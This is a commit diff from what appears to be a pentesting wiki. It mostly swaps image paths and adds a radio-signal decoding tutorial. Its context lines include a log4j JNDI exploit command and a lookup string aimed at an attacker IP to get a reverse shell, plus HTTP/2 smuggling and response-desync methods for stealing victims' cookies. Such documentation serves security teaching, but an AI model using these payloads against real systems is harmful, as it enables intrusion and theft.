GitBook: [#3047] No subject

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@ -30,7 +30,7 @@ If you want to **share some tricks with the community** you can also submit **pu
### [STM Cyber](https://www.stmcyber.com)
![](<.gitbook/assets/image (642) (1).png>)
![](<.gitbook/assets/image (642) (1) (1).png>)
[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentestings, Red teams and training.

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@ -63,7 +63,7 @@ You can also **create your own roles** in _https://github.com/organizations/\<or
You can **list the teams created in an organization** in _https://github.com/orgs/\<org\_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
![](<../../.gitbook/assets/image (630).png>)
![](<../../.gitbook/assets/image (630) (1).png>)
### Users

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@ -86,7 +86,7 @@ If someone creates a **copy** of that **document** that **contained the App Scri
This method will be able to bypass also the Workspace admin restriction:
![](<../.gitbook/assets/image (662).png>)
![](<../.gitbook/assets/image (662) (1).png>)
But can be prevented with:

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@ -37,7 +37,7 @@ URLs example to abuse JNDI:
### JNDI Example
![](<../../.gitbook/assets/image (655).png>)
![](<../../.gitbook/assets/image (655) (1).png>)
Even if you have set a **`PROVIDER_URL`**, you can indicate a different one in a lookup and it will be accessed: `ctx.lookup("<attacker-controlled-url>")` and that is what an attacker will abuse to load arbitrary objects from a system controlled by him.
@ -75,7 +75,7 @@ In case you can **make an app resolve a JNDI LDAP UR**L, you can control the LDA
#### Deserialization exploit
![](<../../.gitbook/assets/image (654) (1).png>)
![](<../../.gitbook/assets/image (654) (1) (1).png>)
The **exploit is serialized** and will be deserialized.\
In case `trustURLCodebase` is `true`, an attacker can provide his own classes in the codebase if not, he will need to abuse gadgets in the classpath.
@ -342,7 +342,7 @@ Use [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) to generat
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
```
![](<../../.gitbook/assets/image (642).png>)
![](<../../.gitbook/assets/image (642) (1).png>)
Now you can easily use a generated JNDI link to exploit the vulnerability and obtain a **reverse shell** just sending to a vulnerable version of log4j: **`${ldap://10.10.14.10:1389/qvrxbu}`**

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@ -4,7 +4,7 @@
The main origin of this vulnerability is the fact that the **reverse proxy** is going to **talk with the client** using **HTTP/2** but then it will **transform** that **communication** with the **back-end server** to **HTTP/1.1**.
![](<../../.gitbook/assets/image (636).png>)
![](<../../.gitbook/assets/image (636) (1).png>)
The problem with this approach is that the **user** is going to be able to **inject** unnecessarily **headers** in the **HTTP/2 communication** that probably **won't be checked** by the proxy. But then, when those are **injected blindly in the HTTP/1.1 communication**, **a request smuggling attack can be performed**.
@ -28,7 +28,7 @@ This technique was abused on AWS load balancer, so making sure that the users ac
This is exactly the same technique as before, but checking the requests James noticed that clients were asking to send him their credentials, so he just modified his server to allow CORS to send him peoples credentials:
![](<../../.gitbook/assets/image (662) (1).png>)
![](<../../.gitbook/assets/image (662) (1) (1).png>)
### H2.TE via Request Header Injection
@ -36,7 +36,7 @@ This is exactly the same technique as before, but checking the requests James no
In this case **the header Transfer-Encoding was injected**.
![](<../../.gitbook/assets/image (648) (1).png>)
![](<../../.gitbook/assets/image (648) (1) (1).png>)
### H2.TE via Header Name Injection
@ -46,19 +46,19 @@ HTTP/2 on some servers lets you put a **colon in the header name, and with a \r\
Note that if you put just the new line characters sending a header without content, the request is going to be treated as **invalid**:
![](<../../.gitbook/assets/image (647).png>)
![](<../../.gitbook/assets/image (647) (1).png>)
### H2.TE via Request LIne Injection
In this case the injection was performed inside the request line:
![](<../../.gitbook/assets/image (640).png>)
![](<../../.gitbook/assets/image (640) (1).png>)
### URL Prefix Injection
Inside the scheme of the HTTP/2 connection you might be able to send a full URL that will overwrite the one indicated in the path:
![](<../../.gitbook/assets/image (661).png>)
![](<../../.gitbook/assets/image (661) (1).png>)
### Request Line Injection via spaces
@ -72,7 +72,7 @@ Note that **even** with that **restriction** you still can perform attacks like
Usually this restriction doesn't exist so you can **smuggle request into the connection between the reverse proxy and the back end** that other people are using, but it's even **possible** that the **proxy** doesn't **even reuse a connection with connections from the same IP** (pretty heavy restriction for this kind of attack).
![](<../../.gitbook/assets/image (646) (1).png>)
![](<../../.gitbook/assets/image (646) (1) (1).png>)
In the heaviest restriction (no connection reuse) you will detect the vulnerability with the Time Based technique, but then testing it you will find that it's a "false positive".
@ -84,7 +84,7 @@ The **problem** with **HTTP/1.1** is that if you **receive 2 HTTP responses** yo
However, this technique can be used **in HTTP/2** because if the endpoint was **vulnerable** and you smuggled one request, you will see the **headers of the response to the smuggled request in the response from the reverse proxy**:
![](<../../.gitbook/assets/image (652).png>)
![](<../../.gitbook/assets/image (652) (1).png>)
### Tunnel-vision Problem
@ -98,7 +98,7 @@ However, the **HEAD** request **doesn't contain a body** but it usually **contai
If you find a **POST** **parameter** inside the application whose **content** is going to be **reflected** in the **response**, then you can try to inject HTTP/1.1 \r\n characters inside a HTTP/2 request header so the newly injected headers by the proxy are going to be appended in the POST parameter that will be reflected in the response:
![](<../../.gitbook/assets/image (656) (1).png>)
![](<../../.gitbook/assets/image (656) (1) (1).png>)
Note that in this case the **attacker** just cares about the **response** to the **first** **request**, he doesn't need to read the request to the smuggled invalid second request.
@ -112,7 +112,7 @@ In this scenario a **HEAD** request to the **URL** **whose** **cache** is going
Due to the fact the the **HEAD response contains the `Content-Type: text/html`** and because the reverse proxy thinks that the **whole response to the smuggled request is the body of the HEAD** request, the **XSS payload** is going to be **treated as HTML** even if the page wasn't vulnerable to XSS.
![](<../../.gitbook/assets/image (659).png>)
![](<../../.gitbook/assets/image (659) (1).png>)
## Hidden HTTP/2

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@ -14,7 +14,7 @@ HTTP/1.1 allows to ask for **different resources without needing to wait for pre
However, there is a problem desynchronising the responses queue. If an attacker send a HTTP Response smuggling attack and the responses to the **initial request and the smuggled one are responded immediately**, the smuggled response won't be inserted inside the queue of the victim response but will **just be discarded as an error**.
![](<../.gitbook/assets/image (635) (1) (1).png>)
![](<../.gitbook/assets/image (635) (1) (1) (1).png>)
Therefore, it's needed that the **smuggled** **request** **takes more time to be processed** inside the back-end server. Therefore, by the time the smuggled request is processed, the communication with the attacker will be over.
@ -22,9 +22,9 @@ If in this specific situation a **victim has sent a request** and the **smuggled
Moreover, is the **attacker then perform a request** and the **legitimate response** to the **victim** request is **answered** **before** the attackers request. The **response to the victim is going to be sent to the attacker**, **stealing** the response to the victim (which can contains for example the header **Set-Cookie**).
![](<../.gitbook/assets/image (658).png>)
![](<../.gitbook/assets/image (658) (1).png>)
![](<../.gitbook/assets/image (655) (1).png>)
![](<../.gitbook/assets/image (655) (1) (1).png>)
### Multiple Nested Injections
@ -52,7 +52,7 @@ First, the attacker send a payload containing a **final POST request with the re
Then, once the **initial request** (blue) was **processed** and **while** the **sleepy** one is being processed (yellow) the **next request that arrives from a victim** is going to be **appended in the queue just after the reflected parameter**:
![](<../.gitbook/assets/image (634).png>)
![](<../.gitbook/assets/image (634) (1).png>)
Then, the **victim** will **receive** the **response to the sleepy** request and if in the meantime the **attacker** **sent** **another** **request**, the **response from the reflected content request will be sent to him**.
@ -80,7 +80,7 @@ Then, the **victim** will **receive** the **response** from the **HEAD** request
Following the previous example, knowing that you can **control the body** of the request whose response is going to receive the victim and that a **HEAD** **response** usually contains in its headers the **Content-Type and the Content-Length**, you can **send a request like the following** one to **cause XSS** in the victim without the page being vulnerable to XSS:
![](<../.gitbook/assets/image (654) (1) (1).png>)
![](<../.gitbook/assets/image (654) (1) (1) (1).png>)
### Cache Poisoning
@ -88,7 +88,7 @@ Abusing the previously commented response desynchronisation Content Confusion at
Malicious request containing the XSS payload:
![](<../.gitbook/assets/image (644).png>)
![](<../.gitbook/assets/image (644) (1).png>)
Malicious response to the victim that contains the header that indicates to the cache to store the response:
@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **
This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**
![](<../.gitbook/assets/image (630) (1).png>)
![](<../.gitbook/assets/image (630) (1) (1).png>)
### Response Splitting
@ -112,11 +112,11 @@ In order to achieve this, the attacker needs to find an endpoint of the web appl
He will send a **exploit** like:
![](<../.gitbook/assets/image (649) (1).png>)
![](<../.gitbook/assets/image (649) (1) (1).png>)
After the first request is resolved and sent back to the attacker, the **victims request is added into the queue**:
![](<../.gitbook/assets/image (661) (1).png>)
![](<../.gitbook/assets/image (661) (1) (1).png>)
The victim will receive as response the **HEAD response + the content of the second request response (containing part of the reflected data):**

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@ -66,7 +66,7 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
spoofed.burpcollaborator.net = 127.0.0.1
```
![](<../../.gitbook/assets/image (649).png>)
![](<../../.gitbook/assets/image (649) (1).png>)
### Domain Parser

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@ -15,7 +15,7 @@ PORT STATE SERVICE REASON
MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**
![](<../.gitbook/assets/image (645).png>)
![](<../.gitbook/assets/image (645) (1).png>)
### ****[**Brute-Force MQTT**](../brute-force.md#mqtt)****

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@ -60,7 +60,7 @@ _This method requires you to run `kubectl` as an **authenticated user**._
**NodePort opens a specific port on all the Nodes** (the VMs), and any **traffic** that is sent to this port is **forwarded to the service**. This is a really bad option usually.
![](<../../.gitbook/assets/image (635) (1).png>)
![](<../../.gitbook/assets/image (635) (1) (1).png>)
An example of NodePort specification:
@ -87,7 +87,7 @@ If you **don't specify** the **nodePort** in the yaml (it's the port that will b
Exposes the Service externally **using a cloud provider's load balancer**. On GKE, this will spin up a [Network Load Balancer](https://cloud.google.com/compute/docs/load-balancing/network/) that will give you a single IP address that will forward all traffic to your service.
![](<../../.gitbook/assets/image (654).png>)
![](<../../.gitbook/assets/image (654) (1).png>)
You have to pay for a LoadBalancer per exposed service, which can get expensive.
@ -139,7 +139,7 @@ Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it
You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**.
![](<../../.gitbook/assets/image (653).png>)
![](<../../.gitbook/assets/image (653) (1).png>)
The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service.

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@ -150,7 +150,7 @@ etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
![](<../../.gitbook/assets/image (637).png>)
![](<../../.gitbook/assets/image (637) (1).png>)
The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:

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@ -299,7 +299,7 @@ yersinia -I #Interactive mode
yersinia -G #For graphic mode
```
![](<../../.gitbook/assets/image (646).png>)
![](<../../.gitbook/assets/image (646) (1).png>)
To access the VLAN packets
@ -344,7 +344,7 @@ If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**
Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.
![](<../../.gitbook/assets/image (635).png>)
![](<../../.gitbook/assets/image (635) (1).png>)
To perform this attack you could use scapy: `pip install scapy`

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@ -8,7 +8,7 @@ BLE devices communicate is by sending **advertising packets** (**beacons**), the
The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldnt fit on the initial advertising request, such as the full device name.
![](<../.gitbook/assets/image (201) (2).png>)
![](<../.gitbook/assets/image (201) (2) (1).png>)
The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV\_NONCONN\_IND and ADV\_IND. Devices use the **ADV\_NONCONN\_IND** PDU type if they **dont accept connections**, transmitting data only in the advertising packet. Devices use **ADV\_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.

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@ -8,7 +8,7 @@ Generally, the line is held high (at a logical 1 value) while UART is in the idl
We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART configuration, we would send the following bits: 0 (the start bit); 0, 1, 0, 0, 0, 0, 1, 1 (the value of 0x43 in binary), and 0 (the stop bit).
![](<../../.gitbook/assets/image (648).png>)
![](<../../.gitbook/assets/image (648) (1).png>)
Hardware tools to communicate with UART:

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@ -12,7 +12,7 @@ To connect with the bus pirate you can follow the docs:
In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
![](<../../.gitbook/assets/image (465).png>)
![](<../../.gitbook/assets/image (465) (2).png>)
To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
@ -120,7 +120,7 @@ NACK
In this scenario we are going to sniff the I2C communication between the arduino and the previous EPROM, you just need to communicate both devices and then connect the bus pirate to the SCL, SDA and GND pins:
![](<../../.gitbook/assets/image (201).png>)
![](<../../.gitbook/assets/image (201) (2).png>)
```bash
I2C>m

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@ -1,8 +1,179 @@
# Radio
## Synchronize with radio channel
## SigDigger
****[**SigDigger** ](https://github.com/BatchDrake/SigDigger)is a free digital signal analyzer for GNU/Linux and macOS, designed to extract information of unknown radio signals. It supports a variety of SDR devices through SoapySDR, and allows adjustable demodulation of FSK, PSK and ASK signals, decode analog video, analyze bursty signals and listen to analog voice channels (all in real time).
### Basic Config
After installing there are a few things that you could consider configuring.\
In settings (the second tab button) you can select the **SDR device** or **select a file** to read and which frequency to syntonise and the Sample rate (recommended to up to 2.56Msps if your PC support it)\
![](<../../.gitbook/assets/image (655).png>)
In the GUI behaviour it's recommended to enable a few things if your PC support it:
![](<../../.gitbook/assets/image (465).png>)
{% hint style="info" %}
If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
{% endhint %}
### Synchronize with radio channel
With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with the channel you want to hear, configure "Baseband audio preview" option, configure the bandwith to get all the info being sent and then set the Tuner to the level before the noise is really starting to increase:
![](<../../.gitbook/assets/image (389).png>)
## Interesting tricks
* When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
* In frames of information you usually should **find different frames well aligned between them**:
![](<../../.gitbook/assets/image (659).png>)
![](<../../.gitbook/assets/image (652).png>)
* After recovering the bytes you might need to process them someway. For example, in Manchester codification a up+down will be a 1 or 0 and a down+up will be the other one. So pairs of 1s and 0s (ups and downs) will be a real 1 or a real 0.
### Uncovering modulation type with IQ
There are 3 ways to store information in signals: Modulating the **amplitude**, **frequency** or **phase**.\
If you are checking a signal there are different ways to try to figure out what is being used to store information (fin more ways below) but a good one is to check the IQ graph.
![](<../../.gitbook/assets/image (630).png>)
* **Detecting AM**: If in the IQ graph appears for example **2 circles** (probably one in 0 and other in a different amplitude), it could means that this is an AM signal. This is because in the IQ graph the distance between the 0 and the circle is the amplitude of the signal, so it's easy to visualize different amplitudes being used.
* **Detecting PM**: Like in the previous image, if you find small circles not related between them it probably means that a phase modulation is used. This is because in the IQ graph, the angle between the point and the 0,0 is the phase of the signal, so that means that 4 different phases are used.
## AM Example
### Uncovering AM
#### Checking the envelope
Checking AM info with [**SigDigger** ](https://github.com/BatchDrake/SigDigger)and just looking at the **envelop** you can see different clear amplitude levels. The used signal is sending pulses with information in AM, this is how one pulse looks like:
![](<../../.gitbook/assets/image (636).png>)
And this is how part of the symbol looks like with the waveform:
![](<../../.gitbook/assets/image (650).png>)
#### Checking the Histogram
You can **select the whole signal** where information is located, select **Amplitude** mode and **Selection** and click on **Histogram.** You can observer that 2 clear levels are only found
![](<../../.gitbook/assets/image (647).png>)
For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
![](<../../.gitbook/assets/image (637).png>)
If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
#### With IQ
In this example you can see how there is a **big circle** but also **a lot of points in the centre.**
![](<../../.gitbook/assets/image (640).png>)
### Get Symbol Rate
#### With one symbol
Select the smallest symbol you can find (so you are sure it's just 1) and check the "Selection freq". I this case it would be 1.013kHz (so 1kHz).
![](<../../.gitbook/assets/image (638).png>)
#### With a group of symbols
You can also indicate the number of symbols you are going to select and SigDigger will calculate the frequency of 1 symbol (the more symbols selected the better probably). In this scenario I selected 10 symbols and the "Selection freq" is 1.004 Khz:
![](<../../.gitbook/assets/image (635).png>)
### Get Bits
Having found this is an **AM modulated** signal and the **symbol rate** (and knowing that in this case something up means 1 and something down means 0), it's very easy to **obtain the bits** encoded in the signal. So, select the signal with info and configure the sampling and decision and press sample (check that **Amplitude** is selected, the discovered **Symbol rate** is configured and the **Gadner clock recovery** is selected):
![](<../../.gitbook/assets/image (642).png>)
* **Sync to selection intervals** means that if you previously selected intervals to find the symbol rate, that symbol rate will be used.
* **Manual** means that the indicated symbol rate is going to be used
* In **Fixed interval selection** you indicate the number of intervals that should be selected and it calculates the symbol rate from it
* **Gadner clock recovery** is usually the best option, but you still need to indicate some approximate symbol rate.
Pressing sample this appears:
![](<../../.gitbook/assets/image (658).png>)
Now, to make SigDigger understand **where is the range** of the level carrying information you need to click on the **lower level** and maintain clicked until the biggest level:
![](<../../.gitbook/assets/image (662).png>)
If there would have been for example **4 different levels of amplitude**, you should have need to configure the **Bits per symbol to 2** and select from the smallest to the biggest.
Finally **increasing** the **Zoom** and **changing the Row size** you can see the bits (and you can select all and copy to get all the bits):
![](<../../.gitbook/assets/image (649).png>)
If the signal has more than 1 bit per symbol (for example 2), SigDigger has **no way to know which symbol is** 00, 01, 10, 11, so it will use different **grey scales** the represent each (and if you copy the bits it will use **numbers from 0 to 3**, you will need to treat them).
Also, use **codifications** such as **Manchester**, and **up+down** can be **1 or 0** and an down+up can be a 1 or 0. In those cases you need to **treat the obtained ups (1) and downs (0)** to substitute the pairs of 01 or 10 as 0s or 1s.
## FM Example
### Uncovering FM
#### Checking the frequencies and waveform
Signal example sending information modulated in FM:
![](<../../.gitbook/assets/image (661).png>)
In the previous image you can observe pretty good that **2 frequencies are used** but if you **observe** the **waveform** you might n**ot be able to identify correctly the 2 different frequencies**:
![](<../../.gitbook/assets/image (653).png>)
This is because I capture the signal in booth frequencies, therefore one is approximately the other in negative:
&#x20;
![](<../../.gitbook/assets/image (656).png>)
If the synchronized frequency is **closer to one frequency than to the other** you can easily see the 2 different frequencies:
![](<../../.gitbook/assets/image (648).png>)
![](<../../.gitbook/assets/image (634).png>)
#### Checking the histogram
Checking the frequency histogram of the signal with information you can easily see 2 different signals:
![](<../../.gitbook/assets/image (657).png>)
In this case if you check the **Amplitude histogram** you will find **only one amplitude**, so it **cannot be AM** (if you find a lot of amplitudes it might be because the signal has been losing power along the channel):
![](<../../.gitbook/assets/image (646).png>)
And this is would be phase histogram (which makes very clear the signal is not modulated in phase):
![](<../../.gitbook/assets/image (201).png>)
#### With IQ
IQ doesn't have a field to identify frequencies (distance to centre is amplitude and angle is phase).\
Therefore, to identify FM, you should **only see basically a circle** in this graph.\
Moreover,
![](<../../.gitbook/assets/image (643).png>)
### Get Symbol Rate
You can use the **same technique as the one used in the AM example** to get the symbol rate once you have found the frequencies carrying symbols.
### Get Bits
You can use the **same technique as the one used in the AM example** to get the bits once you have **found the signal is modulated in frequency** and the **symbol rate**.